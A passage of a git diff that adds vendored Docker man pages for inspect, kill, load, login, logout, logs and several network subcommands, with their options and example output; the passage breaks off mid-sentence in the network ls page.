+ CPUs: 1 + Total Memory: 991.7 MiB + Name: ip-172-30-0-91.ec2.internal + ID: I54V:OLXT:HVMM:TPKO:JPHQ:CQCD:JNLC:O3BZ:4ZVJ:43XJ:PFHZ:6N2S + Docker Root Dir: /var/lib/docker + Debug mode (client): false + Debug mode (server): false + Username: gordontheturtle + Registry: https://index.docker.io/v1/ + Insecure registries: + myinsecurehost:5000 + 127.0.0.0/8 + +You can also specify the output format: + + $ docker info --format '{{json .}}' + {"ID":"I54V:OLXT:HVMM:TPKO:JPHQ:CQCD:JNLC:O3BZ:4ZVJ:43XJ:PFHZ:6N2S","Containers":14, ...} + +# HISTORY +April 2014, Originally compiled by William Henry (whenry at redhat dot com) +based on docker.com source material and internal work. +June 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-inspect.1.md b/vendor/github.com/docker/docker/man/docker-inspect.1.md new file mode 100644 index 0000000000..21d7ba678a --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-inspect.1.md @@ -0,0 +1,323 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-inspect - Return low-level information on docker objects + +# SYNOPSIS +**docker inspect** +[**--help**] +[**-f**|**--format**[=*FORMAT*]] +[**-s**|**--size**] +[**--type**=*container*|*image*|*network*|*node*|*service*|*task*|*volume*] +NAME|ID [NAME|ID...] + +# DESCRIPTION + +This displays the low-level information on Docker object(s) (e.g. container, +image, volume,network, node, service, or task) identified by name or ID. By default, +this will render all results in a JSON array. If the container and image have +the same name, this will return container JSON for unspecified type. If a format +is specified, the given template will be executed for each result. 
+ +# OPTIONS +**--help** + Print usage statement + +**-f**, **--format**="" + Format the output using the given Go template + +**-s**, **--size** + Display total file sizes if the type is container + +**--type**=*container*|*image*|*network*|*node*|*service*|*task*|*volume* + Return JSON for specified type, permissible values are "image", "container", + "network", "node", "service", "task", and "volume" + +# EXAMPLES + +Get information about an image when image name conflicts with the container name, +e.g. both image and container are named rhel7: + + $ docker inspect --type=image rhel7 + [ + { + "Id": "fe01a428b9d9de35d29531e9994157978e8c48fa693e1bf1d221dffbbb67b170", + "Parent": "10acc31def5d6f249b548e01e8ffbaccfd61af0240c17315a7ad393d022c5ca2", + .... + } + ] + +## Getting information on a container + +To get information on a container use its ID or instance name: + + $ docker inspect d2cc496561d6 + [{ + "Id": "d2cc496561d6d520cbc0236b4ba88c362c446a7619992123f11c809cded25b47", + "Created": "2015-06-08T16:18:02.505155285Z", + "Path": "bash", + "Args": [], + "State": { + "Running": false, + "Paused": false, + "Restarting": false, + "OOMKilled": false, + "Dead": false, + "Pid": 0, + "ExitCode": 0, + "Error": "", + "StartedAt": "2015-06-08T16:18:03.643865954Z", + "FinishedAt": "2015-06-08T16:57:06.448552862Z" + }, + "Image": "ded7cd95e059788f2586a51c275a4f151653779d6a7f4dad77c2bd34601d94e4", + "NetworkSettings": { + "Bridge": "", + "SandboxID": "6b4851d1903e16dd6a567bd526553a86664361f31036eaaa2f8454d6f4611f6f", + "HairpinMode": false, + "LinkLocalIPv6Address": "", + "LinkLocalIPv6PrefixLen": 0, + "Ports": {}, + "SandboxKey": "/var/run/docker/netns/6b4851d1903e", + "SecondaryIPAddresses": null, + "SecondaryIPv6Addresses": null, + "EndpointID": "7587b82f0dada3656fda26588aee72630c6fab1536d36e394b2bfbcf898c971d", + "Gateway": "172.17.0.1", + "GlobalIPv6Address": "", + "GlobalIPv6PrefixLen": 0, + "IPAddress": "172.17.0.2", + "IPPrefixLen": 16, + "IPv6Gateway": "", + 
"MacAddress": "02:42:ac:12:00:02", + "Networks": { + "bridge": { + "NetworkID": "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812", + "EndpointID": "7587b82f0dada3656fda26588aee72630c6fab1536d36e394b2bfbcf898c971d", + "Gateway": "172.17.0.1", + "IPAddress": "172.17.0.2", + "IPPrefixLen": 16, + "IPv6Gateway": "", + "GlobalIPv6Address": "", + "GlobalIPv6PrefixLen": 0, + "MacAddress": "02:42:ac:12:00:02" + } + } + + }, + "ResolvConfPath": "/var/lib/docker/containers/d2cc496561d6d520cbc0236b4ba88c362c446a7619992123f11c809cded25b47/resolv.conf", + "HostnamePath": "/var/lib/docker/containers/d2cc496561d6d520cbc0236b4ba88c362c446a7619992123f11c809cded25b47/hostname", + "HostsPath": "/var/lib/docker/containers/d2cc496561d6d520cbc0236b4ba88c362c446a7619992123f11c809cded25b47/hosts", + "LogPath": "/var/lib/docker/containers/d2cc496561d6d520cbc0236b4ba88c362c446a7619992123f11c809cded25b47/d2cc496561d6d520cbc0236b4ba88c362c446a7619992123f11c809cded25b47-json.log", + "Name": "/adoring_wozniak", + "RestartCount": 0, + "Driver": "devicemapper", + "MountLabel": "", + "ProcessLabel": "", + "Mounts": [ + { + "Source": "/data", + "Destination": "/data", + "Mode": "ro,Z", + "RW": false + "Propagation": "" + } + ], + "AppArmorProfile": "", + "ExecIDs": null, + "HostConfig": { + "Binds": null, + "ContainerIDFile": "", + "Memory": 0, + "MemorySwap": 0, + "CpuShares": 0, + "CpuPeriod": 0, + "CpusetCpus": "", + "CpusetMems": "", + "CpuQuota": 0, + "BlkioWeight": 0, + "OomKillDisable": false, + "Privileged": false, + "PortBindings": {}, + "Links": null, + "PublishAllPorts": false, + "Dns": null, + "DnsSearch": null, + "DnsOptions": null, + "ExtraHosts": null, + "VolumesFrom": null, + "Devices": [], + "NetworkMode": "bridge", + "IpcMode": "", + "PidMode": "", + "UTSMode": "", + "CapAdd": null, + "CapDrop": null, + "RestartPolicy": { + "Name": "no", + "MaximumRetryCount": 0 + }, + "SecurityOpt": null, + "ReadonlyRootfs": false, + "Ulimits": null, + "LogConfig": { + "Type": 
"json-file", + "Config": {} + }, + "CgroupParent": "" + }, + "GraphDriver": { + "Name": "devicemapper", + "Data": { + "DeviceId": "5", + "DeviceName": "docker-253:1-2763198-d2cc496561d6d520cbc0236b4ba88c362c446a7619992123f11c809cded25b47", + "DeviceSize": "171798691840" + } + }, + "Config": { + "Hostname": "d2cc496561d6", + "Domainname": "", + "User": "", + "AttachStdin": true, + "AttachStdout": true, + "AttachStderr": true, + "ExposedPorts": null, + "Tty": true, + "OpenStdin": true, + "StdinOnce": true, + "Env": null, + "Cmd": [ + "bash" + ], + "Image": "fedora", + "Volumes": null, + "VolumeDriver": "", + "WorkingDir": "", + "Entrypoint": null, + "NetworkDisabled": false, + "MacAddress": "", + "OnBuild": null, + "Labels": {}, + "Memory": 0, + "MemorySwap": 0, + "CpuShares": 0, + "Cpuset": "", + "StopSignal": "SIGTERM" + } + } + ] +## Getting the IP address of a container instance + +To get the IP address of a container use: + + $ docker inspect --format='{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' d2cc496561d6 + 172.17.0.2 + +## Listing all port bindings + +One can loop over arrays and maps in the results to produce simple text +output: + + $ docker inspect --format='{{range $p, $conf := .NetworkSettings.Ports}} \ + {{$p}} -> {{(index $conf 0).HostPort}} {{end}}' d2cc496561d6 + 80/tcp -> 80 + +You can get more information about how to write a Go template from: +https://golang.org/pkg/text/template/. + +## Getting size information on a container + + $ docker inspect -s d2cc496561d6 + [ + { + .... + "SizeRw": 0, + "SizeRootFs": 972, + .... 
+ } + ] + +## Getting information on an image + +Use an image's ID or name (e.g., repository/name[:tag]) to get information +about the image: + + $ docker inspect ded7cd95e059 + [{ + "Id": "ded7cd95e059788f2586a51c275a4f151653779d6a7f4dad77c2bd34601d94e4", + "Parent": "48ecf305d2cf7046c1f5f8fcbcd4994403173441d4a7f125b1bb0ceead9de731", + "Comment": "", + "Created": "2015-05-27T16:58:22.937503085Z", + "Container": "76cf7f67d83a7a047454b33007d03e32a8f474ad332c3a03c94537edd22b312b", + "ContainerConfig": { + "Hostname": "76cf7f67d83a", + "Domainname": "", + "User": "", + "AttachStdin": false, + "AttachStdout": false, + "AttachStderr": false, + "ExposedPorts": null, + "Tty": false, + "OpenStdin": false, + "StdinOnce": false, + "Env": null, + "Cmd": [ + "/bin/sh", + "-c", + "#(nop) ADD file:4be46382bcf2b095fcb9fe8334206b584eff60bb3fad8178cbd97697fcb2ea83 in /" + ], + "Image": "48ecf305d2cf7046c1f5f8fcbcd4994403173441d4a7f125b1bb0ceead9de731", + "Volumes": null, + "VolumeDriver": "", + "WorkingDir": "", + "Entrypoint": null, + "NetworkDisabled": false, + "MacAddress": "", + "OnBuild": null, + "Labels": {} + }, + "DockerVersion": "1.6.0", + "Author": "Lokesh Mandvekar \u003clsm5@fedoraproject.org\u003e", + "Config": { + "Hostname": "76cf7f67d83a", + "Domainname": "", + "User": "", + "AttachStdin": false, + "AttachStdout": false, + "AttachStderr": false, + "ExposedPorts": null, + "Tty": false, + "OpenStdin": false, + "StdinOnce": false, + "Env": null, + "Cmd": null, + "Image": "48ecf305d2cf7046c1f5f8fcbcd4994403173441d4a7f125b1bb0ceead9de731", + "Volumes": null, + "VolumeDriver": "", + "WorkingDir": "", + "Entrypoint": null, + "NetworkDisabled": false, + "MacAddress": "", + "OnBuild": null, + "Labels": {} + }, + "Architecture": "amd64", + "Os": "linux", + "Size": 186507296, + "VirtualSize": 186507296, + "GraphDriver": { + "Name": "devicemapper", + "Data": { + "DeviceId": "3", + "DeviceName": 
"docker-253:1-2763198-ded7cd95e059788f2586a51c275a4f151653779d6a7f4dad77c2bd34601d94e4", + "DeviceSize": "171798691840" + } + } + } + ] + +# HISTORY +April 2014, originally compiled by William Henry (whenry at redhat dot com) +based on docker.com source material and internal work. +June 2014, updated by Sven Dowideit +April 2015, updated by Qiang Huang +October 2015, updated by Sally O'Malley diff --git a/vendor/github.com/docker/docker/man/docker-kill.1.md b/vendor/github.com/docker/docker/man/docker-kill.1.md new file mode 100644 index 0000000000..36cbdb90ea --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-kill.1.md @@ -0,0 +1,28 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-kill - Kill a running container using SIGKILL or a specified signal + +# SYNOPSIS +**docker kill** +[**--help**] +[**-s**|**--signal**[=*"KILL"*]] +CONTAINER [CONTAINER...] + +# DESCRIPTION + +The main process inside each container specified will be sent SIGKILL, + or any signal specified with option --signal. + +# OPTIONS +**--help** + Print usage statement + +**-s**, **--signal**="*KILL*" + Signal to send to the container + +# HISTORY +April 2014, Originally compiled by William Henry (whenry at redhat dot com) + based on docker.com source material and internal work. +June 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-load.1.md b/vendor/github.com/docker/docker/man/docker-load.1.md new file mode 100644 index 0000000000..b165173047 --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-load.1.md @@ -0,0 +1,56 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-load - Load an image from a tar archive or STDIN + +# SYNOPSIS +**docker load** +[**--help**] +[**-i**|**--input**[=*INPUT*]] +[**-q**|**--quiet**] + +# DESCRIPTION + +Loads a tarred repository from a file or the standard input stream. +Restores both images and tags. 
+Write image names or IDs imported to the
+standard output stream.
+
+# OPTIONS
+**--help**
+ Print usage statement
+
+**-i**, **--input**=""
+ Read from a tar archive file, instead of STDIN. The tarball may be compressed with gzip, bzip, or xz.
+
+**-q**, **--quiet**
+ Suppress the load progress bar but still outputs the imported images.
+
+# EXAMPLES
+
+ $ docker images
+ REPOSITORY TAG IMAGE ID CREATED SIZE
+ busybox latest 769b9341d937 7 weeks ago 2.489 MB
+ $ docker load --input fedora.tar
+ # […]
+ Loaded image: fedora:rawhide
+ # […]
+ Loaded image: fedora:20
+ # […]
+ $ docker images
+ REPOSITORY TAG IMAGE ID CREATED SIZE
+ busybox latest 769b9341d937 7 weeks ago 2.489 MB
+ fedora rawhide 0d20aec6529d 7 weeks ago 387 MB
+ fedora 20 58394af37342 7 weeks ago 385.5 MB
+ fedora heisenbug 58394af37342 7 weeks ago 385.5 MB
+ fedora latest 58394af37342 7 weeks ago 385.5 MB
+
+# See also
+**docker-save(1)** to save one or more images to a tar archive (streamed to STDOUT by default).
+
+# HISTORY
+April 2014, Originally compiled by William Henry (whenry at redhat dot com)
+based on docker.com source material and internal work.
+June 2014, updated by Sven Dowideit
+July 2015 update by Mary Anthony
+June 2016 update by Vincent Demeester
diff --git a/vendor/github.com/docker/docker/man/docker-login.1.md b/vendor/github.com/docker/docker/man/docker-login.1.md
new file mode 100644
index 0000000000..c0d4f795db
--- /dev/null
+++ b/vendor/github.com/docker/docker/man/docker-login.1.md
@@ -0,0 +1,53 @@
+% DOCKER(1) Docker User Manuals
+% Docker Community
+% JUNE 2014
+# NAME
+docker-login - Log in to a Docker registry.
+
+# SYNOPSIS
+**docker login**
+[**--help**]
+[**-p**|**--password**[=*PASSWORD*]]
+[**-u**|**--username**[=*USERNAME*]]
+[SERVER]
+
+# DESCRIPTION
+Log in to a Docker Registry located on the specified
+`SERVER`. You can specify a URL or a `hostname` for the `SERVER` value.
If you +do not specify a `SERVER`, the command uses Docker's public registry located at +`https://registry-1.docker.io/` by default. To get a username/password for Docker's public registry, create an account on Docker Hub. + +`docker login` requires user to use `sudo` or be `root`, except when: + +1. connecting to a remote daemon, such as a `docker-machine` provisioned `docker engine`. +2. user is added to the `docker` group. This will impact the security of your system; the `docker` group is `root` equivalent. See [Docker Daemon Attack Surface](https://docs.docker.com/engine/articles/security/#docker-daemon-attack-surface) for details. + +You can log into any public or private repository for which you have +credentials. When you log in, the command stores encoded credentials in +`$HOME/.docker/config.json` on Linux or `%USERPROFILE%/.docker/config.json` on Windows. + +# OPTIONS +**--help** + Print usage statement + +**-p**, **--password**="" + Password + +**-u**, **--username**="" + Username + +# EXAMPLES + +## Login to a registry on your localhost + + # docker login localhost:8080 + +# See also +**docker-logout(1)** to log out from a Docker registry. + +# HISTORY +April 2014, Originally compiled by William Henry (whenry at redhat dot com) +based on docker.com source material and internal work. +June 2014, updated by Sven Dowideit +April 2015, updated by Mary Anthony for v2 +November 2015, updated by Sally O'Malley diff --git a/vendor/github.com/docker/docker/man/docker-logout.1.md b/vendor/github.com/docker/docker/man/docker-logout.1.md new file mode 100644 index 0000000000..a8a4b7c3c0 --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-logout.1.md @@ -0,0 +1,32 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-logout - Log out from a Docker registry. + +# SYNOPSIS +**docker logout** +[SERVER] + +# DESCRIPTION +Log out of a Docker Registry located on the specified `SERVER`. 
You can +specify a URL or a `hostname` for the `SERVER` value. If you do not specify a +`SERVER`, the command attempts to log you out of Docker's public registry +located at `https://registry-1.docker.io/` by default. + +# OPTIONS +There are no available options. + +# EXAMPLES + +## Log out from a registry on your localhost + + # docker logout localhost:8080 + +# See also +**docker-login(1)** to log in to a Docker registry server. + +# HISTORY +June 2014, Originally compiled by Daniel, Dao Quang Minh (daniel at nitrous dot io) +July 2014, updated by Sven Dowideit +April 2015, updated by Mary Anthony for v2 diff --git a/vendor/github.com/docker/docker/man/docker-logs.1.md b/vendor/github.com/docker/docker/man/docker-logs.1.md new file mode 100644 index 0000000000..e70f796e28 --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-logs.1.md @@ -0,0 +1,71 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-logs - Fetch the logs of a container + +# SYNOPSIS +**docker logs** +[**-f**|**--follow**] +[**--help**] +[**--since**[=*SINCE*]] +[**-t**|**--timestamps**] +[**--tail**[=*"all"*]] +CONTAINER + +# DESCRIPTION +The **docker logs** command batch-retrieves whatever logs are present for +a container at the time of execution. This does not guarantee execution +order when combined with a docker run (i.e., your run may not have generated +any logs at the time you execute docker logs). + +The **docker logs --follow** command combines commands **docker logs** and +**docker attach**. It will first return all logs from the beginning and +then continue streaming new output from the container's stdout and stderr. + +**Warning**: This command works only for the **json-file** or **journald** +logging drivers. + +# OPTIONS +**--help** + Print usage statement + +**--details**=*true*|*false* + Show extra details provided to logs + +**-f**, **--follow**=*true*|*false* + Follow log output. The default is *false*. 
+ +**--since**="" + Show logs since timestamp + +**-t**, **--timestamps**=*true*|*false* + Show timestamps. The default is *false*. + +**--tail**="*all*" + Output the specified number of lines at the end of logs (defaults to all logs) + +The `--since` option can be Unix timestamps, date formatted timestamps, or Go +duration strings (e.g. `10m`, `1h30m`) computed relative to the client machine's +time. Supported formats for date formatted time stamps include RFC3339Nano, +RFC3339, `2006-01-02T15:04:05`, `2006-01-02T15:04:05.999999999`, +`2006-01-02Z07:00`, and `2006-01-02`. The local timezone on the client will be +used if you do not provide either a `Z` or a `+-00:00` timezone offset at the +end of the timestamp. When providing Unix timestamps enter +seconds[.nanoseconds], where seconds is the number of seconds that have elapsed +since January 1, 1970 (midnight UTC/GMT), not counting leap seconds (aka Unix +epoch or Unix time), and the optional .nanoseconds field is a fraction of a +second no more than nine digits long. You can combine the `--since` option with +either or both of the `--follow` or `--tail` options. + +The `docker logs --details` command will add on extra attributes, such as +environment variables and labels, provided to `--log-opt` when creating the +container. + +# HISTORY +April 2014, Originally compiled by William Henry (whenry at redhat dot com) +based on docker.com source material and internal work. 
+June 2014, updated by Sven Dowideit +July 2014, updated by Sven Dowideit +April 2015, updated by Ahmet Alp Balkan +October 2015, updated by Mike Brown diff --git a/vendor/github.com/docker/docker/man/docker-network-connect.1.md b/vendor/github.com/docker/docker/man/docker-network-connect.1.md new file mode 100644 index 0000000000..096ec77a4d --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-network-connect.1.md @@ -0,0 +1,66 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% OCT 2015 +# NAME +docker-network-connect - connect a container to a network + +# SYNOPSIS +**docker network connect** +[**--help**] +NETWORK CONTAINER + +# DESCRIPTION + +Connects a container to a network. You can connect a container by name +or by ID. Once connected, the container can communicate with other containers in +the same network. + +```bash +$ docker network connect multi-host-network container1 +``` + +You can also use the `docker run --network=` option to start a container and immediately connect it to a network. + +```bash +$ docker run -itd --network=multi-host-network --ip 172.20.88.22 --ip6 2001:db8::8822 busybox +``` +You can pause, restart, and stop containers that are connected to a network. +A container connects to its configured networks when it runs. + +If specified, the container's IP address(es) is reapplied when a stopped +container is restarted. If the IP address is no longer available, the container +fails to start. One way to guarantee that the IP address is available is +to specify an `--ip-range` when creating the network, and choose the static IP +address(es) from outside that range. This ensures that the IP address is not +given to another container while this container is not on the network. 
+ +```bash +$ docker network create --subnet 172.20.0.0/16 --ip-range 172.20.240.0/20 multi-host-network +``` + +```bash +$ docker network connect --ip 172.20.128.2 multi-host-network container2 +``` + +To verify the container is connected, use the `docker network inspect` command. Use `docker network disconnect` to remove a container from the network. + +Once connected in network, containers can communicate using only another +container's IP address or name. For `overlay` networks or custom plugins that +support multi-host connectivity, containers connected to the same multi-host +network but launched from different Engines can also communicate in this way. + +You can connect a container to one or more networks. The networks need not be the same type. For example, you can connect a single container bridge and overlay networks. + + +# OPTIONS +**NETWORK** + Specify network name + +**CONTAINER** + Specify container name + +**--help** + Print usage statement + +# HISTORY +OCT 2015, created by Mary Anthony diff --git a/vendor/github.com/docker/docker/man/docker-network-create.1.md b/vendor/github.com/docker/docker/man/docker-network-create.1.md new file mode 100644 index 0000000000..44ce8e15c2 --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-network-create.1.md @@ -0,0 +1,187 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% OCT 2015 +# NAME +docker-network-create - create a new network + +# SYNOPSIS +**docker network create** +[**--attachable**] +[**--aux-address**=*map[]*] +[**-d**|**--driver**=*DRIVER*] +[**--gateway**=*[]*] +[**--help**] +[**--internal**] +[**--ip-range**=*[]*] +[**--ipam-driver**=*default*] +[**--ipam-opt**=*map[]*] +[**--ipv6**] +[**--label**[=*[]*]] +[**-o**|**--opt**=*map[]*] +[**--subnet**=*[]*] +NETWORK-NAME + +# DESCRIPTION + +Creates a new network. The `DRIVER` accepts `bridge` or `overlay` which are the +built-in network drivers. 
If you have installed a third party or your own custom
+network driver you can specify that `DRIVER` here also. If you don't specify the
+`--driver` option, the command automatically creates a `bridge` network for you.
+When you install Docker Engine it creates a `bridge` network automatically. This
+network corresponds to the `docker0` bridge that Engine has traditionally relied
+on. When you launch a new container with `docker run` it automatically connects
+to this bridge network. You cannot remove this default bridge network but you
+can create new ones using the `network create` command.
+
+```bash
+$ docker network create -d bridge my-bridge-network
+```
+
+Bridge networks are isolated networks on a single Engine installation. If you
+want to create a network that spans multiple Docker hosts each running an
+Engine, you must create an `overlay` network. Unlike `bridge` networks overlay
+networks require some pre-existing conditions before you can create one. These
+conditions are:
+
+* Access to a key-value store. Engine supports Consul, Etcd, and Zookeeper (Distributed store) key-value stores.
+* A cluster of hosts with connectivity to the key-value store.
+* A properly configured Engine `daemon` on each host in the cluster.
+
+The `dockerd` options that support the `overlay` network are:
+
+* `--cluster-store`
+* `--cluster-store-opt`
+* `--cluster-advertise`
+
+To read more about these options and how to configure them, see ["*Get started
+with multi-host
+network*"](https://docs.docker.com/engine/userguide/networking/get-started-overlay/).
+
+It is also a good idea, though not required, that you install Docker Swarm to
+manage the cluster that makes up your network. Swarm provides sophisticated
+discovery and server management that can assist your implementation.
+
+Once you have prepared the `overlay` network prerequisites you simply choose a
+Docker host in the cluster and issue the following to create the network:
+
+```bash
+$ docker network create -d overlay my-multihost-network
+```
+
+Network names must be unique. The Docker daemon attempts to identify naming
+conflicts but this is not guaranteed. It is the user's responsibility to avoid
+name conflicts.
+
+## Connect containers
+
+When you start a container, use the `--network` flag to connect it to a network.
+This adds the `busybox` container to the `mynet` network.
+
+```bash
+$ docker run -itd --network=mynet busybox
+```
+
+If you want to add a container to a network after the container is already
+running, use the `docker network connect` subcommand.
+
+You can connect multiple containers to the same network. Once connected, the
+containers can communicate using only another container's IP address or name.
+For `overlay` networks or custom plugins that support multi-host connectivity,
+containers connected to the same multi-host network but launched from different
+Engines can also communicate in this way.
+
+You can disconnect a container from a network using the `docker network
+disconnect` command.
+
+## Specifying advanced options
+
+When you create a network, Engine creates a non-overlapping subnetwork for the
+network by default. This subnetwork is not a subdivision of an existing network.
+It is purely for IP addressing purposes. You can override this default and
+specify subnetwork values directly using the `--subnet` option. On a
+`bridge` network you can only create a single subnet:
+
+```bash
+$ docker network create -d bridge --subnet=192.168.0.0/16 br0
+```
+
+Additionally, you can also specify the `--gateway`, `--ip-range`, and
+`--aux-address` options.
+ +```bash +$ docker network create \ + --driver=bridge \ + --subnet=172.28.0.0/16 \ + --ip-range=172.28.5.0/24 \ + --gateway=172.28.5.254 \ + br0 +``` + +If you omit the `--gateway` flag the Engine selects one for you from inside a +preferred pool. For `overlay` networks and for network driver plugins that +support it you can create multiple subnetworks. + +```bash +$ docker network create -d overlay \ + --subnet=192.168.0.0/16 \ + --subnet=192.170.0.0/16 \ + --gateway=192.168.0.100 \ + --gateway=192.170.0.100 \ + --ip-range=192.168.1.0/24 \ + --aux-address="my-router=192.168.1.5" --aux-address="my-switch=192.168.1.6" \ + --aux-address="my-printer=192.170.1.5" --aux-address="my-nas=192.170.1.6" \ + my-multihost-network +``` + +Be sure that your subnetworks do not overlap. If they do, the network create +fails and Engine returns an error. + +### Network internal mode + +By default, when you connect a container to an `overlay` network, Docker also +connects a bridge network to it to provide external connectivity. If you want +to create an externally isolated `overlay` network, you can specify the +`--internal` option. + +# OPTIONS +**--attachable** + Enable manual container attachment + +**--aux-address**=map[] + Auxiliary IPv4 or IPv6 addresses used by network driver + +**-d**, **--driver**=*DRIVER* + Driver to manage the Network bridge or overlay. The default is bridge. 
+ +**--gateway**=[] + IPv4 or IPv6 Gateway for the master subnet + +**--help** + Print usage + +**--internal** + Restrict external access to the network + +**--ip-range**=[] + Allocate container ip from a sub-range + +**--ipam-driver**=*default* + IP Address Management Driver + +**--ipam-opt**=map[] + Set custom IPAM driver options + +**--ipv6** + Enable IPv6 networking + +**--label**=*label* + Set metadata for a network + +**-o**, **--opt**=map[] + Set custom driver options + +**--subnet**=[] + Subnet in CIDR format that represents a network segment + +# HISTORY +OCT 2015, created by Mary Anthony diff --git a/vendor/github.com/docker/docker/man/docker-network-disconnect.1.md b/vendor/github.com/docker/docker/man/docker-network-disconnect.1.md new file mode 100644 index 0000000000..09bcac51b0 --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-network-disconnect.1.md @@ -0,0 +1,36 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% OCT 2015 +# NAME +docker-network-disconnect - disconnect a container from a network + +# SYNOPSIS +**docker network disconnect** +[**--help**] +[**--force**] +NETWORK CONTAINER + +# DESCRIPTION + +Disconnects a container from a network. 
+ +```bash + $ docker network disconnect multi-host-network container1 +``` + + +# OPTIONS +**NETWORK** + Specify network name + +**CONTAINER** + Specify container name + +**--force** + Force the container to disconnect from a network + +**--help** + Print usage statement + +# HISTORY +OCT 2015, created by Mary Anthony diff --git a/vendor/github.com/docker/docker/man/docker-network-inspect.1.md b/vendor/github.com/docker/docker/man/docker-network-inspect.1.md new file mode 100644 index 0000000000..f27c98cb34 --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-network-inspect.1.md @@ -0,0 +1,112 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% OCT 2015 +# NAME +docker-network-inspect - inspect a network + +# SYNOPSIS +**docker network inspect** +[**-f**|**--format**[=*FORMAT*]] +[**--help**] +NETWORK [NETWORK...] + +# DESCRIPTION + +Returns information about one or more networks. By default, this command renders all results in a JSON object. For example, if you connect two containers to the default `bridge` network: + +```bash +$ sudo docker run -itd --name=container1 busybox +f2870c98fd504370fb86e59f32cd0753b1ac9b69b7d80566ffc7192a82b3ed27 + +$ sudo docker run -itd --name=container2 busybox +bda12f8922785d1f160be70736f26c1e331ab8aaf8ed8d56728508f2e2fd4727 +``` + +The `network inspect` command shows the containers, by id, in its +results. You can specify an alternate format to execute a given +template for each result. Go's +[text/template](http://golang.org/pkg/text/template/) package +describes all the details of the format. 
+ +```bash +$ sudo docker network inspect bridge +[ + { + "Name": "bridge", + "Id": "b2b1a2cba717161d984383fd68218cf70bbbd17d328496885f7c921333228b0f", + "Scope": "local", + "Driver": "bridge", + "IPAM": { + "Driver": "default", + "Config": [ + { + "Subnet": "172.17.42.1/16", + "Gateway": "172.17.42.1" + } + ] + }, + "Internal": false, + "Containers": { + "bda12f8922785d1f160be70736f26c1e331ab8aaf8ed8d56728508f2e2fd4727": { + "Name": "container2", + "EndpointID": "0aebb8fcd2b282abe1365979536f21ee4ceaf3ed56177c628eae9f706e00e019", + "MacAddress": "02:42:ac:11:00:02", + "IPv4Address": "172.17.0.2/16", + "IPv6Address": "" + }, + "f2870c98fd504370fb86e59f32cd0753b1ac9b69b7d80566ffc7192a82b3ed27": { + "Name": "container1", + "EndpointID": "a00676d9c91a96bbe5bcfb34f705387a33d7cc365bac1a29e4e9728df92d10ad", + "MacAddress": "02:42:ac:11:00:01", + "IPv4Address": "172.17.0.1/16", + "IPv6Address": "" + } + }, + "Options": { + "com.docker.network.bridge.default_bridge": "true", + "com.docker.network.bridge.enable_icc": "true", + "com.docker.network.bridge.enable_ip_masquerade": "true", + "com.docker.network.bridge.host_binding_ipv4": "0.0.0.0", + "com.docker.network.bridge.name": "docker0", + "com.docker.network.driver.mtu": "1500" + } + } +] +``` + +Returns the information about the user-defined network: + +```bash +$ docker network create simple-network +69568e6336d8c96bbf57869030919f7c69524f71183b44d80948bd3927c87f6a +$ docker network inspect simple-network +[ + { + "Name": "simple-network", + "Id": "69568e6336d8c96bbf57869030919f7c69524f71183b44d80948bd3927c87f6a", + "Scope": "local", + "Driver": "bridge", + "IPAM": { + "Driver": "default", + "Config": [ + { + "Subnet": "172.22.0.0/16", + "Gateway": "172.22.0.1" + } + ] + }, + "Containers": {}, + "Options": {} + } +] +``` + +# OPTIONS +**-f**, **--format**="" + Format the output using the given Go template. 
+ +**--help** + Print usage statement + +# HISTORY +OCT 2015, created by Mary Anthony diff --git a/vendor/github.com/docker/docker/man/docker-network-ls.1.md b/vendor/github.com/docker/docker/man/docker-network-ls.1.md new file mode 100644 index 0000000000..f319e66035 --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-network-ls.1.md @@ -0,0 +1,188 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% OCT 2015 +# NAME +docker-network-ls - list networks + +# SYNOPSIS +**docker network ls** +[**-f**|**--filter**[=*[]*]] +[**--format**=*"TEMPLATE"*] +[**--no-trunc**[=*true*|*false*]] +[**-q**|**--quiet**[=*true*|*false*]] +[**--help**] + +# DESCRIPTION + +Lists all the networks the Engine `daemon` knows about. This includes the +networks that span across multiple hosts in a cluster, for example: + +```bash + $ docker network ls + NETWORK ID NAME DRIVER SCOPE + 7fca4eb8c647 bridge bridge local + 9f904ee27bf5 none null local + cf03ee007fb4 host host local + 78b03ee04fc4 multi-host overlay swarm +``` + +Use the `--no-trunc` option to display the full network id: + +```bash +$ docker network ls --no-trunc +NETWORK ID NAME DRIVER +18a2866682b85619a026c81b98a5e375bd33e1b0936a26cc497c283d27bae9b3 none null +c288470c46f6c8949c5f7e5099b5b7947b07eabe8d9a27d79a9cbf111adcbf47 host host +7b369448dccbf865d397c8d2be0cda7cf7edc6b0945f77d2529912ae917a0185 bridge bridge +95e74588f40db048e86320c6526440c504650a1ff3e9f7d60a497c4d2163e5bd foo bridge +63d1ff1f77b07ca51070a8c227e962238358bd310bde1529cf62e6c307ade161 dev bridge +``` + +## Filtering + +The filtering flag (`-f` or `--filter`) format is a `key=value` pair. If there +is more than one filter, then pass multiple flags (e.g. `--filter "foo=bar" --filter "bif=baz"`). +Multiple filter flags are combined as an `OR` filter. For example, +`-f type=custom -f 